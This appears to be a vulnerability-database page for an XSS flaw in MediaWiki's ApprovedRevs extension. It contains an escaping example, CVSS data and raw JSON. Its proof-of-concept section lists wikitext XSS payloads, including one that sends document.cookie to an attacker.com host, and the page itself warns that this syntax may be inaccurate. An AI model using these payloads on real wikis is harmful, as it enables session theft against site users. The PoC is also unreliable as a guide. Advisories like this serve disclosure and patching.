Security Vulnerability Report
CVE-2026-22712 CVSS 4.3 MEDIUM

Published: 2026-01-09 00:15:46
Last Modified: 2026-02-12 17:50:28
Source: c4f26cc8-17ff-4c99-b5e2-38fc1793eacc

Description

Improper Encoding or Escaping of Output (CWE-116) due to magic word replacement in the ParserAfterTidy hook of The Wikimedia Foundation's MediaWiki ApprovedRevs extension allows input data manipulation. This issue affects the MediaWiki ApprovedRevs extension versions 1.39, 1.43, 1.44 and 1.45. ParserAfterTidy is invoked on the fully rendered, already sanitised page HTML, so a value the extension substitutes for its magic word at that stage is emitted without further escaping; any attacker-influenced content in that value therefore reaches the reader's browser unmodified.
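The advisory names the mechanism but carries no code for it. The block below is an added illustration, not code from ApprovedRevs, MediaWiki or this page: a standalone PHP sketch of a ParserAfterTidy-style substitution in its vulnerable and hardened forms. Only the hook name and its by-reference `$text` parameter come from MediaWiki's hook interface; the marker string, the `lookupEditorControlledValue()` helper and the sample HTML are assumptions made for the example.

```php
<?php
declare(strict_types=1);
// Added illustration (not ApprovedRevs or MediaWiki code) of why a value
// substituted in a ParserAfterTidy hook must be escaped. MediaWiki calls
// ParserAfterTidy on the already-sanitised, tidied HTML, so whatever the
// hook writes into $text goes to the browser as-is. MARKER,
// lookupEditorControlledValue() and the sample HTML below are assumptions.

const MARKER = '<!--EXAMPLE-MAGIC-WORD-->';

/** Hypothetical lookup of a value that a page editor controls. */
function lookupEditorControlledValue(string $pageName): string
{
    // Constructed sample: what an attacker would store in page content.
    return '<img src=x onerror=alert(1)>';
}

/** Vulnerable pattern: raw substitution after sanitisation already ran. */
function onParserAfterTidyVulnerable(string $pageName, string &$text): void
{
    $text = str_replace(MARKER, lookupEditorControlledValue($pageName), $text);
}

/** Hardened pattern: HTML-escape the value before it enters the output. */
function onParserAfterTidyFixed(string $pageName, string &$text): void
{
    $safe = htmlspecialchars(
        lookupEditorControlledValue($pageName),
        ENT_QUOTES | ENT_HTML5,
        'UTF-8'
    );
    $text = str_replace(MARKER, $safe, $text);
}

/** Reviewer check: true if the substituted value survived as a live tag. */
function outputHasRawTag(string $html): bool
{
    return (bool) preg_match('/<(img|svg|script)\b/i', $html);
}

// Constructed sample of tidied parser output that still holds the marker.
$html = '<div class="mw-parser-output"><p>Approval: ' . MARKER . '</p></div>';

$vuln = $html;
onParserAfterTidyVulnerable('Example page', $vuln);
$fixed = $html;
onParserAfterTidyFixed('Example page', $fixed);

printf("vulnerable: %s\n  raw tag present: %s\n", $vuln, var_export(outputHasRawTag($vuln), true));
printf("fixed:      %s\n  raw tag present: %s\n", $fixed, var_export(outputHasRawTag($fixed), true));
```

Run with `php example.php`: the vulnerable output carries the `<img ... onerror=...>` element verbatim, the hardened output carries `&lt;img src=x onerror=alert(1)&gt;` as inert text. In a real extension the same rule applies whichever helper you use (`htmlspecialchars()`, or `Html::element()` for a whole element): anything written into the post-tidy text must already be HTML-safe, because no sanitiser runs after that hook.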

CVSS Details

CVSS 3.1 (NVD, primary)
Score: 4.3
Severity: MEDIUM
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Exploitability subscore 2.8, impact subscore 1.4: reachable over the network with no privileges, but a user must interact (view the affected page), and the scored impact is limited to low integrity, with no confidentiality or availability impact.

CVSS 4.0 (CNA, secondary)
Score: 2.3
Severity: LOW
Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L

Weakness: CWE-116 (Improper Encoding or Escaping of Output)

Configurations (Affected Products)

cpe:2.3:a:wikiworks:approved_revs:1.39:*:*:*:*:mediawiki:*:* (MediaWiki ApprovedRevs Extension 1.39) - VULNERABLE
cpe:2.3:a:wikiworks:approved_revs:1.43:*:*:*:*:mediawiki:*:* (MediaWiki ApprovedRevs Extension 1.43) - VULNERABLE
cpe:2.3:a:wikiworks:approved_revs:1.44:*:*:*:*:mediawiki:*:* (MediaWiki ApprovedRevs Extension 1.44) - VULNERABLE
cpe:2.3:a:wikiworks:approved_revs:1.45:*:*:*:*:mediawiki:*:* (MediaWiki ApprovedRevs Extension 1.45) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
wikitext
<!-- CVE-2026-22712 PoC for MediaWiki ApprovedRevs Extension -->
<!-- Output-encoding flaw in the magic word replacement mechanism -->

<!-- Step 1: create a page whose content carries the malicious payload -->
<!-- Inject an XSS payload into the page content -->
{{#approvedrevs:some_page|<script>alert('XSS-CVE-2026-22712')</script>}}

<!-- Or use a differently encoded payload -->
{{#approvedrevs:page_name|<img src=x onerror=alert(document.cookie)>}}

<!-- Step 2: induce an administrator to approve that revision -->
<!-- Trigger the flaw through the magic word syntax -->
{{#approvedrevs:target_page|javascript:alert('CVE-2026-22712')}}

<!-- Step 3: the XSS fires when other users view the approved revision -->
<!-- Reflected XSS payload example -->
{{#approvedrevs:vulnerable_page|<svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>}}

Two caveats before relying on this block. The advisory's own CVSS 3.1 vector scores no confidentiality impact (C:N) and only low integrity impact (I:L), so the cookie-exfiltration payloads above claim more than the advisory supports. The `{{#approvedrevs:...}}` parser-function syntax is also not documented anywhere on this page; confirm the actual magic word against the linked Gerrit patch before reusing the block.

References

https://gerrit.wikimedia.org/r/q/Iee1bf1cbc8a519899e7f9dde508856bd4e5a5d2a (Patch)
https://phabricator.wikimedia.org/T412068 (Exploit, Issue Tracking)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22712", "sourceIdentifier": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "published": "2026-01-09T00:15:45.837", "lastModified": "2026-02-12T17:50:28.073", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Encoding or Escaping of Output due to magic word replacement in ParserAfterTidy vulnerability in The Wikimedia Foundation Mediawiki - ApprovedRevs Extension allows Input Data Manipulation.This issue affects Mediawiki - ApprovedRevs Extension: 1.45, 1.44, 1.43, 1.39."}, {"lang": "es", "value": "Codificación o escape incorrectos de la salida debido al reemplazo de palabra mágica en la vulnerabilidad ParserAfterTidy en la Extensión ApprovedRevs de Mediawiki de la Fundación Wikimedia permite la manipulación de datos de entrada. Este problema afecta a la Extensión ApprovedRevs de Mediawiki: 1.45, 1.44, 1.43, 1.39."}], "metrics": {"cvssMetricV40": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-116"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.39:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "0680AAB5-C5C7-42A3-9CB3-D99E0126955B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.43:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "293B8B8B-6988-4E0A-AC72-B49D7C98C050"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.44:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "30B9A0EC-4B7F-4B53-B073-B18291ECB4F6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wikiworks:approved_revs:1.45:*:*:*:*:mediawiki:*:*", "matchCriteriaId": "73ADBE38-7AFF-4A77-8294-5786ABC4C852"}]}]}], "references": [{"url": "https://gerrit.wikimedia.org/r/q/Iee1bf1cbc8a519899e7f9dde508856bd4e5a5d2a", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Patch"]}, 
{"url": "https://phabricator.wikimedia.org/T412068", "source": "c4f26cc8-17ff-4c99-b5e2-38fc1793eacc", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://phabricator.wikimedia.org/T412068", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}